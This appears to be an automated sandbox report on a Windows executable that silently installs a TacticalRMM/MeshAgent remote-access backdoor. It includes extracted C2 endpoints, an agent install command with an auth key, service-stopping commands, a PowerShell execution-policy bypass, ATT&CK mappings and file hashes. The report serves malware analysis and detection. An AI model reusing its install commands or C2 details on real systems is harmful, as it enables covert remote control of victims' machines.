Overview

overview

10

Static

static

1

2025-01-20...ch.exe

windows7-x64

10

2025-01-20...ch.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-01-2025 02:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-01-20_0e3dbb7d5032353cb14865e83fb9960c_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe

  • Size

    5.0MB

  • MD5

    0e3dbb7d5032353cb14865e83fb9960c

  • SHA1

    e1382b357b797f3083f75b9c8242dcd349b88533

  • SHA256

    bb9d02d32e235b6c7453298f73cfd26fa89c5d0bbcd7a819d092835d4d038774

  • SHA512

    08b31d0f53e81ac2bd26456a02e61f8330ebe42f15019d1a052c4c0250477b67eae35026c91b81e39e1c42c8810341f60f5bfa806a23f343d40ce6a1bddf6de2

  • SSDEEP

    49152:Dkk1lQkvWuVMrb/TcvO90d7HjmAFd4A64nsfJW5B270PGUJ+GSZ05UU4SVaDs1CW:okvWuVrfz+ZUfVaA6El+ert

Score
10/10
meshagenttacticalrmmbackdoordiscoveryevasionexecutionpersistencerattrojan

Malware Config

Extracted

Family

meshagent

Version

2

Botnet

TacticalRMM

C2

http://mesh.ztn.app:443/agent.ashx

Attributes
  • mesh_id

    0x1AC5A427D36E6A21D10128F481F9AC5A8DA677889ACD69D474A4B30819BCBFF7B979A19A780A3C6E50E3CD3AE57878ED

  • server_id

    58BA8120DEF0E4E89076972F82774D385B0F397F68F98E8BF0EF8B2C63F080982D35511B9CE190622EC6A4316C9AF531

  • wss

    wss://mesh.ztn.app:443/agent.ashx

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

    rattrojanbackdoormeshagent
  • Meshagent family
    meshagent
  • Blocklisted process makes network request 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops file in System32 directory 6 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

    execution
  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
    evasionspywaretrojan
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-01-20_0e3dbb7d5032353cb14865e83fb9960c_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-01-20_0e3dbb7d5032353cb14865e83fb9960c_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1448
    • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
      C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2800
      • C:\Users\Admin\AppData\Local\Temp\is-FRDUA.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-FRDUA.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$800B6,3660179,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2856
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2716
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2580
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrpc
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2552
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrpc
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2548
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2568
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2624
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2676
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2848
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1036
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1360
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM tacticalrmm.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2820
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2232
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalagent
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1580
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2540
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalrpc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:288
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c tacticalrmm.exe -m installsvc
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:600
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            tacticalrmm.exe -m installsvc
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:988
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net start tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1132
          • C:\Windows\SysWOW64\net.exe
            net start tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:872
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2816
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.ztn.app --client-id 14 --site-id 37 --agent-type workstation --auth c52763ea5e8516c687c06875af1bd779e47c159661b3df56cdcc3c1a649244f4
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1724
      • C:\Program Files\TacticalAgent\meshagent.exe
        "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
        3⤵
        • Sets service image path in registry
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:2960
      • C:\Program Files\Mesh Agent\MeshAgent.exe
        "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
        3⤵
        • Executes dropped EXE
        PID:2092
  • C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe"
    1⤵
    • Executes dropped EXE
    • Drops file in Program Files directory
    • Modifies data under HKEY_USERS
    PID:2080
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      PID:984
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1088
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1748
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
        PID:1312
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
          PID:2300
        • C:\Windows\System32\wbem\wmic.exe
          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
          2⤵
            PID:2328
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in Program Files directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:996
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Drops file in Program Files directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2476
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2080 -s 472
            2⤵
            • Loads dropped DLL
            PID:2664
        • C:\Program Files\Mesh Agent\MeshAgent.exe
          "C:\Program Files\Mesh Agent\MeshAgent.exe"
          1⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          PID:2580
          • C:\Windows\System32\wbem\wmic.exe
            wmic SystemEnclosure get ChassisTypes
            2⤵
              PID:3032
            • C:\Windows\system32\wbem\wmic.exe
              wmic os get oslanguage /FORMAT:LIST
              2⤵
                PID:484
              • C:\Windows\System32\wbem\wmic.exe
                wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                2⤵
                  PID:1100
                • C:\Windows\System32\wbem\wmic.exe
                  wmic SystemEnclosure get ChassisTypes
                  2⤵
                    PID:2824
                  • C:\Windows\System32\wbem\wmic.exe
                    wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                    2⤵
                      PID:2856
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -noprofile -nologo -command -
                      2⤵
                      • Drops file in Program Files directory
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2968
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -noprofile -nologo -command -
                      2⤵
                      • Drops file in Program Files directory
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2404
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -noprofile -nologo -command -
                      2⤵
                      • Drops file in Program Files directory
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:916
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -noprofile -nologo -command -
                      2⤵
                      • Drops file in Program Files directory
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1772
                  • C:\Program Files\TacticalAgent\tacticalrmm.exe
                    "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
                    1⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Drops file in Program Files directory
                    • Drops file in Windows directory
                    • Modifies data under HKEY_USERS
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3064
                    • C:\Program Files\TacticalAgent\tacticalrmm.exe
                      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m checkrunner
                      2⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2872
                    • C:\Program Files\Mesh Agent\MeshAgent.exe
                      "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
                      2⤵
                      • Executes dropped EXE
                      PID:1548
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\206812853.ps1
                      2⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2304

                  Network

                  MITRE ATT&CK Enterprise v15

                  Reconnaissance

                  Resource Development

                  Initial Access

                  Execution

                  Command and Scripting Interpreter

                  1
                  T1059

                  PowerShell

                  1
                  T1059.001

                  System Services

                  1
                  T1569

                  Service Execution

                  1
                  T1569.002

                  Persistence

                  Boot or Logon Autostart Execution

                  1
                  T1547

                  Registry Run Keys / Startup Folder

                  1
                  T1547.001

                  Create or Modify System Process

                  1
                  T1543

                  Windows Service

                  1
                  T1543.003

                  Privilege Escalation

                  Boot or Logon Autostart Execution

                  1
                  T1547

                  Registry Run Keys / Startup Folder

                  1
                  T1547.001

                  Create or Modify System Process

                  1
                  T1543

                  Windows Service

                  1
                  T1543.003

                  Defense Evasion

                  Impair Defenses

                  1
                  T1562

                  Modify Registry

                  2
                  T1112

                  Subvert Trust Controls

                  1
                  T1553

                  Install Root Certificate

                  1
                  T1553.004

                  Credential Access

                  Discovery

                  Query Registry

                  1
                  T1012

                  Remote System Discovery

                  1
                  T1018

                  System Location Discovery

                  1
                  T1614

                  System Language Discovery

                  1
                  T1614.001

                  System Network Configuration Discovery

                  1
                  T1016

                  Internet Connection Discovery

                  1
                  T1016.001

                  Lateral Movement

                  Collection

                  Command and Control

                  Exfiltration

                  Impact

                  Service Stop

                  1
                  T1489

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Program Files\Mesh Agent\MeshAgent.db
                    Filesize

                    35KB

                    MD5

                    2e5c2d4e852d89af4580e2a48cd65a83

                    SHA1

                    912ab195ec9bd4dbb146f9debb72f30bf61ce864

                    SHA256

                    3d0c42d8a6de668e8e84aa1f1408de9cae536833bd056feeddb7f5898bcc3e0d

                    SHA512

                    b2cbf61a33a036b2bb9c157cf55d3e7870b71fc05d79c36aa1b07a422ebac2f671409934e0fceacb35b47b903f8c84a38934631b851d957c0dc0680f2f36c4e1

                    Download Submit

                  • C:\Program Files\Mesh Agent\MeshAgent.db
                    Filesize

                    153KB

                    MD5

                    50a9d8b7d49336d8882caccd2eabeea4

                    SHA1

                    15aa4c09778765058828c247153ec236d7428d59

                    SHA256

                    fd91335f4d8bcc1804636e955740438460cbf6ebb55a5d0f0977c1c15fdd6d1e

                    SHA512

                    ecc74f839fe88d74ac18ee6bec3429ed763bbd1497a13f2166894c4679a51bb37c50170260acdb1d5a05868c66d5a0d1598fc009c910e76b4ea4acf47a58e08d

                    Download Submit

                  • C:\Program Files\Mesh Agent\MeshAgent.msh
                    Filesize

                    31KB

                    MD5

                    abf1f93f3c86d44dc77bbd2d674e80fb

                    SHA1

                    e6b352be46bf02efc660477673bf2a84fc431935

                    SHA256

                    e07f7ec6f0eca86912458c385ba7f61b923374b220ff709319a508382aa6e1d6

                    SHA512

                    f50ab10e3855f387c08316c3a0c56e6a3b1af906847dccb925438e0ecfe064916faa00efd702aabf4f598a7117e35cd78fc80baa64e276b64925c528bd9e4832

                    Download Submit

                  • C:\Program Files\TacticalAgent\agent.log
                    Filesize

                    67B

                    MD5

                    6b45de0fdb7c8349a07ae2ecc7b685a8

                    SHA1

                    2b2ba75dd14ef642702db124826f1b319510fe39

                    SHA256

                    40dfebde5f8d820ce78a10abe60f5b0be9a33dc4404083820b77505abe47658b

                    SHA512

                    05a7000a64f6df5281131f24dba1d169552d79a4a41a4ee5a7c71c336e307efbd4d3c2620f3f83e0950619a76bc7a92d89eb0760081fc7c353f126d08e5e2e11

                    Download Submit

                  • C:\ProgramData\TacticalRMM\206812853.ps1
                    Filesize

                    35KB

                    MD5

                    e9fb33c49bee675e226d1afeef2740d9

                    SHA1

                    ded4e30152638c4e53db4c3c62a76fe0b69e60ab

                    SHA256

                    44e045ed5350758616d664c5af631e7f2cd10165f5bf2bd82cbf3a0bb8f63462

                    SHA512

                    2661a981d48d58c9ceb1992e55061ce07af0d53b5f38b07de620376e0ea1d876c7e50965e67aee80fe723968bdb956dc7fd93e7923608534c8fb4d21739dbc48

                    Download Submit

                  • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
                    Filesize

                    4.3MB

                    MD5

                    2f046950e65922336cd83bf0dbc9de33

                    SHA1

                    ddc64a8b21c8146c93c0b19c1eeb0ef784b980c6

                    SHA256

                    412e1f600251b21911c582e69381f677e663231f5e1d10786d88a026e00ea811

                    SHA512

                    a11cbf8b8b692d2d5a0e3af5a97f91a3d1f3e7aa39966eb7d62b3244b3913f2fdc21823d5c94de0d98e579f801709df44433af91567356361d5d9699a93b2cbc

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\is-FRDUA.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
                    Filesize

                    3.0MB

                    MD5

                    a639312111d278fee4f70299c134d620

                    SHA1

                    6144ca6e18a5444cdb9b633a6efee67aff931115

                    SHA256

                    4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

                    SHA512

                    f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

                    Download Submit

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
                    Filesize

                    914B

                    MD5

                    e4a68ac854ac5242460afd72481b2a44

                    SHA1

                    df3c24f9bfd666761b268073fe06d1cc8d4f82a4

                    SHA256

                    cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

                    SHA512

                    5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

                    Download Submit

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                    Filesize

                    70KB

                    MD5

                    49aebf8cbd62d92ac215b2923fb1b9f5

                    SHA1

                    1723be06719828dda65ad804298d0431f6aff976

                    SHA256

                    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                    SHA512

                    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                    Download Submit

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                    Filesize

                    1KB

                    MD5

                    a266bb7dcc38a562631361bbf61dd11b

                    SHA1

                    3b1efd3a66ea28b16697394703a72ca340a05bd5

                    SHA256

                    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                    SHA512

                    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                    Download Submit

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
                    Filesize

                    252B

                    MD5

                    3c86de9e3a7f892b1e5415288e1812b9

                    SHA1

                    e311e5f4b9133e4103be895c1ae30825c96fcbc8

                    SHA256

                    5a6163a31567e2bd50ac78456f28c217a611aa239ffe34fd9d86a915ee47227e

                    SHA512

                    8f7fd37cad9223474a8eaf212cd23a245ca0371d480b2c6694150540f8d1ac92bd99c20d6ac3b18b05d2716d1fb5aca98ed17201c9c8fe01ef4375acf06409e0

                    Download Submit

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                    Filesize

                    342B

                    MD5

                    97bcc85179f449c0cd8ee01404e2f9b4

                    SHA1

                    de249ee3006aeeb15e0dcdb4d52843396adf4ced

                    SHA256

                    ec011b7c9d48627628980cd8b177c089f737a0731c8cee340c9db54a4c797442

                    SHA512

                    f908b7d5bb3d9bc9e6dfe0f0dde87108545fad092562b4f89e9e65fa09339dade8e8c8c3083a2a41e4fbb6251f983e386721bf0f3ad05b39f1ac9cd683753bbf

                    Download Submit

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                    Filesize

                    342B

                    MD5

                    68c92fe22aea9da2ad00428df6513d48

                    SHA1

                    c0af5bf2020794b2c231cf2476c36a1907cad6a4

                    SHA256

                    6547900b66a0cb13698c4377b8778e2e3f029c28313bafc06c57dd4cf8c5bbbf

                    SHA512

                    e8044e609d13cb328801d3517322d9b3c12f94d88e74f3669c97245d2c54c65c1502aa1b1b54ffc7ea847178d32b1b380e145e0934aae94d5180a5c81ce600e9

                    Download Submit

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                    Filesize

                    342B

                    MD5

                    6ac3299657f57000bd61a78c82e1c0b1

                    SHA1

                    e1ba738ecadb3bdf8ed95c7865a527693b61a000

                    SHA256

                    e0f02468066d79c01e3de332f2534bd522159e8d179d10361ced50a3279aefe3

                    SHA512

                    635396689cb75429a2ba80ea55553d5ce20aeb940545f4c7c88d0b2f50d9867543485db87b7f2a66af5dda03980ad614e6921201765ff5cc6ffffa34fccf941f

                    Download Submit

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                    Filesize

                    342B

                    MD5

                    26b2e466ffffbe1f672829d0763aa94f

                    SHA1

                    24514d69e88c41d68121faa14aa17966cbd71f84

                    SHA256

                    ced0f8ff4840d2791c46c070e8140ede799e89a31899024d8002913960280e09

                    SHA512

                    661b9c74cd5fd494c5a632bb41bd494aff855e73d4cf9fdc22f2f6b797a29ce70c85b5fa301697a9c2f0b90c540bbb70338e049864ddac197b1e18cf5c0f7c0e

                    Download Submit

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                    Filesize

                    242B

                    MD5

                    1ba190224ffa0eb0ccc1630e9094d131

                    SHA1

                    fc3bb2339abba67fecd0ce2b270815be05d87614

                    SHA256

                    2382316aa5302c6f06ae8591a0ec606d3461390e533d64dfabfa4bd71321cb00

                    SHA512

                    01fd6c0ead6789f4eb0d76be839a82f1e30afb56439aaee76e9180936d30edab4d802f87d55e0e31cedf554de41f5063513a8e73a9016a46a32aa853cae15904

                    Download Submit

                  • C:\Windows\Temp\CabD461.tmp
                    Filesize

                    29KB

                    MD5

                    d59a6b36c5a94916241a3ead50222b6f

                    SHA1

                    e274e9486d318c383bc4b9812844ba56f0cff3c6

                    SHA256

                    a38d01d3f024e626d579cf052ac3bd4260bb00c34bc6085977a5f4135ab09b53

                    SHA512

                    17012307955fef045e7c13bf0613bd40df27c29778ba6572640b76c18d379e02dc478e855c9276737363d0ad09b9a94f2adaa85da9c77ebb3c2d427aa68e2489

                    Download Submit

                  • C:\Windows\Temp\TarD60D.tmp
                    Filesize

                    181KB

                    MD5

                    4ea6026cf93ec6338144661bf1202cd1

                    SHA1

                    a1dec9044f750ad887935a01430bf49322fbdcb7

                    SHA256

                    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                    SHA512

                    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                    Download Submit

                  • \Program Files\TacticalAgent\meshagent.exe
                    Filesize

                    3.3MB

                    MD5

                    e5d7d294c417575310a4472580a16257

                    SHA1

                    66be889ae2caeb288e81b4693087a38d7af14a03

                    SHA256

                    fd0cf4ace405f05f67784eea2dc9dada61d6ba16ff94165d9a9865c1b4745dbb

                    SHA512

                    c4dcb8b24592843e51ba9cd74ea0874a8aafeba255dad34d94399683f2fd56858388e39255c478a981ba5537ebf7e54000a4ea4ab862289efc0eab9de2683fc6

                    Download Submit

                  • \Program Files\TacticalAgent\tacticalrmm.exe
                    Filesize

                    9.2MB

                    MD5

                    bb383b7c3d5e4acb1001ab099b5b0f3c

                    SHA1

                    cb0c85f84a454aa4b1aab02bfba47c4355c2311e

                    SHA256

                    a6d3159c858aa3704f35d69b27829618ad0d1bae894c848a5233100c17464f95

                    SHA512

                    157dda96d1cacea55a6be27b9d432225b47d7334e664e577cef82a14c7eb1be1b8b84423b3905a4c1caecb5394be264d9b5c3e32109a4893e51a9d406ce740be

                    Download Submit

                  • memory/988-24-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/988-25-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/996-64-0x000000001B4A0000-0x000000001B782000-memory.dmp

                    Filesize

                    2.9MB

                    Download

                  • memory/996-65-0x0000000001D40000-0x0000000001D48000-memory.dmp

                    Filesize

                    32KB

                    Download

                  • memory/1724-35-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-36-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-93-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-92-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-81-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-140-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-142-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-82-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-33-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-34-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-80-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-75-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/1724-74-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                    Download

                  • memory/2476-76-0x000000001B340000-0x000000001B622000-memory.dmp

                    Filesize

                    2.9MB

                    Download

                  • memory/2476-77-0x0000000001C00000-0x0000000001C08000-memory.dmp

                    Filesize

                    32KB

                    Download

                  • memory/2800-30-0x0000000000400000-0x00000000004D7000-memory.dmp

                    Filesize

                    860KB

                    Download

                  • memory/2800-7-0x0000000000401000-0x00000000004B7000-memory.dmp

                    Filesize

                    728KB

                    Download

                  • memory/2800-4-0x0000000000400000-0x00000000004D7000-memory.dmp

                    Filesize

                    860KB

                    Download

                  • memory/2856-14-0x0000000000400000-0x0000000000712000-memory.dmp

                    Filesize

                    3.1MB

                    Download

                  • memory/2856-29-0x0000000000400000-0x0000000000712000-memory.dmp

                    Filesize

                    3.1MB

